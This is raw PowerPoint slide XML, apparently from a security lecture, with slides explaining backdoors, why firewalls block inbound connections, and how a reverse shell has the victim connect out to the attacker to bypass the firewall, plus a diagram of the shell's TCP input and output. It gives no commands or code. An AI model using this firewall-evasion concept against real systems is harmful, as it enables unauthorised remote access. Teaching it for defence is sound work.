          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="4294967295"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10402529" y="6041362"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>21</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" kern="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2125122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Motivation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="Text Placeholder 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Normal backdoor at victim’s PC needs to be activate by the attacker</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Victim can setup a firewall to block the income connecting request</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="Image result for fire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518" y="4023199"/>
            <a:ext cx="5601588" cy="219559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743F91A7-6CB8-DB6A-2DDD-A6B0E1D0F328}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5935980" y="2324100"/>
            <a:ext cx="502920" cy="25222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5810B019-E431-AF3A-5D0A-AB6946B1AA80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5105400" y="2720340"/>
            <a:ext cx="5516880" cy="2125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B85E6CB-A996-659F-CCDB-CEA43CE67FF1}"/>
                  </a:ext>
                </a:extLst>
              </p14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="10490917" y="3355162"/>
              <a:ext cx="4320" cy="4680"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="2" name="Ink 1">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB85E6CB-A996-659F-CCDB-CEA43CE67FF1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvPicPr/>
              <p:nvPr/>
            </p:nvPicPr>
            <p:blipFill>
              <a:blip r:embed="rId4"/>
              <a:stretch>
                <a:fillRect/>
              </a:stretch>
            </p:blipFill>
            <p:spPr>
              <a:xfrm>
                <a:off x="10482277" y="3346162"/>
                <a:ext cx="21960" cy="22320"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
        </mc:Fallback>
      </mc:AlternateContent>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="198983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bypass firewall?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Text Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Firewall doesn’t block signals sent from victims</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let the victim sends the signal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let the attacker to listen to the signal</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="l"/>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en" smtClean="0"/>
              <a:pPr algn="l"/>
              <a:t>23</a:t>
            </a:fld>
            <a:endParaRPr lang="en"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 2" descr="Image result for fire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750" y="1"/>
            <a:ext cx="5104285" cy="2000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fire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750" y="4296307"/>
            <a:ext cx="5104285" cy="2000676"/>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7885330" y="4420697"/>
            <a:ext cx="2631367" cy="1491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solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:ln>
              <a:solidFill>
                <a:srgbClr val="FF0000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8482642" y="4010328"/>
            <a:ext cx="1811009" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Reverse shell</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="686110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4" name="Straight Connector 23">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29">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677335" y="1282701"/>
            <a:ext cx="5096060" cy="4307148"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="r">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="5400"/>
              <a:t>Reverse shell definition</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="37" name="Freeform: Shape 31">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p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7821120" y="2510119"/>
            <a:ext cx="3602567" cy="1829292"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buSzPct val="80000"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Reverse shell is getting the connection from the victim or target to your computer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8590663" y="6041362"/>
            <a:ext cx="683339" cy="365125"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:spcAft>
                <a:spcPts val="600"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{00000000-1234-1234-1234-123412341234}" type="slidenum">
              <a:rPr lang="en-US" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:pPr>
                <a:spcAft>
                  <a:spcPts val="600"/>
                </a:spcAft>
              </a:pPr>
              <a:t>24</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" kern="1200">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:latin typeface="+mn-lt"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3430879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Reverse shell demo</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="25" name="Group 24"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="691306" y="3101419"/>
            <a:ext cx="9244345" cy="2167923"/>
            <a:chOff x="1220568" y="4947656"/>
            <a:chExt cx="16789969" cy="4722849"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="26" name="pasted-image.tif"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="1220568" y="6319169"/>
              <a:ext cx="2050617" cy="2050617"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="28" name="Shape 201"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4531579" y="5705086"/>
              <a:ext cx="2122268" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr>
                <a:defRPr sz="2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>std input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="29" name="Shape 202"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4550624" y="7663171"/>
              <a:ext cx="2164425" cy="1023276"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr>
                <a:defRPr sz="2300"/>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="1867" dirty="0"/>
                <a:t>std output</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="30" name="Shape 203"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="3381619" y="6442023"/>
              <a:ext cx="1083158" cy="438163"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="31" name="Shape 204"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3321689" y="7804900"/>
              <a:ext cx="1079942" cy="355834"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="32" name="Picture 31"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579816" y="6023612"/>
              <a:ext cx="5434477" cy="101603"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="33" name="Picture 32"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="6463892"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="34" name="Picture 33"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="7937137"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="35" name="Picture 34"/>
            <p:cNvPicPr/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId3"/>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="6579818" y="8428218"/>
              <a:ext cx="5434478" cy="101604"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="36" name="Shape 213"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="12026615" y="6185254"/>
              <a:ext cx="1092679" cy="380241"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="37" name="Shape 214"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="12117936" y="7804899"/>
              <a:ext cx="838107" cy="523630"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="38" name="Shape 215"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm flipH="1">
              <a:off x="8298014" y="6294553"/>
              <a:ext cx="2390972" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="39" name="Shape 216"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8233576" y="8233479"/>
              <a:ext cx="2519848" cy="1"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="25400">
              <a:solidFill/>
              <a:miter lim="400000"/>
              <a:tailEnd type="triangle"/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="2400"/>
              </a:pPr>
              <a:endParaRPr sz="4267"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="40" name="Shape 217"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8901674" y="4947656"/>
              <a:ext cx="1379383" cy="1529499"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr>
                <a:defRPr sz="1900" b="1">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800" b="0"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3377" dirty="0" err="1"/>
                <a:t>tcp</a:t>
              </a:r>
              <a:endParaRPr sz="3377" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="41" name="Shape 218"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="9012254" y="8141006"/>
              <a:ext cx="1379383" cy="1529499"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle>
              <a:lvl1pPr>
                <a:defRPr sz="1900" b="1">
                  <a:latin typeface="Helvetica"/>
                  <a:ea typeface="Helvetica"/>
                  <a:cs typeface="Helvetica"/>
                  <a:sym typeface="Helvetica"/>
                </a:defRPr>
              </a:lvl1pPr>
            </a:lstStyle>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800" b="0"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="3377"/>
                <a:t>tcp</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Shape 219"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13351927" y="6095079"/>
              <a:ext cx="3841634" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>puts input</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="43" name="Shape 220"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13246136" y="7266198"/>
              <a:ext cx="4764401" cy="1112395"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="12700">
              <a:miter lim="400000"/>
            </a:ln>
            <a:extLst>
              <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
                <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
              </a:ext>
            </a:extLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:pPr lvl="0">
                <a:defRPr sz="1800"/>
              </a:pPr>
              <a:r>
                <a:rPr sz="2133" dirty="0"/>
                <a:t>receive</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="2133" dirty="0"/>
                <a:t> output</a:t>
              </a:r>
              <a:endParaRPr sz="2133" dirty="0"/>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="45" name="Picture 44"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="9675751" y="3705465"/>
            <a:ext cx="1357165" cy="870848"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="Shape 198"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="774914" y="4722416"/>
            <a:ext cx="851932" cy="674832"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="12700">
            <a:miter lim="400000"/>
          </a:ln>
          <a:extLst>
            <a:ext uri="{C572A759-6A51-4108-AA02-DFA0A04FC94B}">
              <ma14:wrappingTextBoxFlag xmlns="" xmlns:ma14="http://schemas.microsoft.com/office/mac/drawingml/2011/main" val="1"/>
            </a:ext>
          </a:extLst>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" lIns="90313" tIns="90313" rIns="90313" bIns="90313" anchor="ctr">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:defRPr b="1">
                <a:solidFill>
                  <a:srgbClr val="00882B"/>
                </a:solidFill>
                <a:latin typeface="Helvetica"/>
                <a:ea typeface="Helvetica"/>
                <a:cs typeface="Helvetica"/>
                <a:sym typeface="Helvetica"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
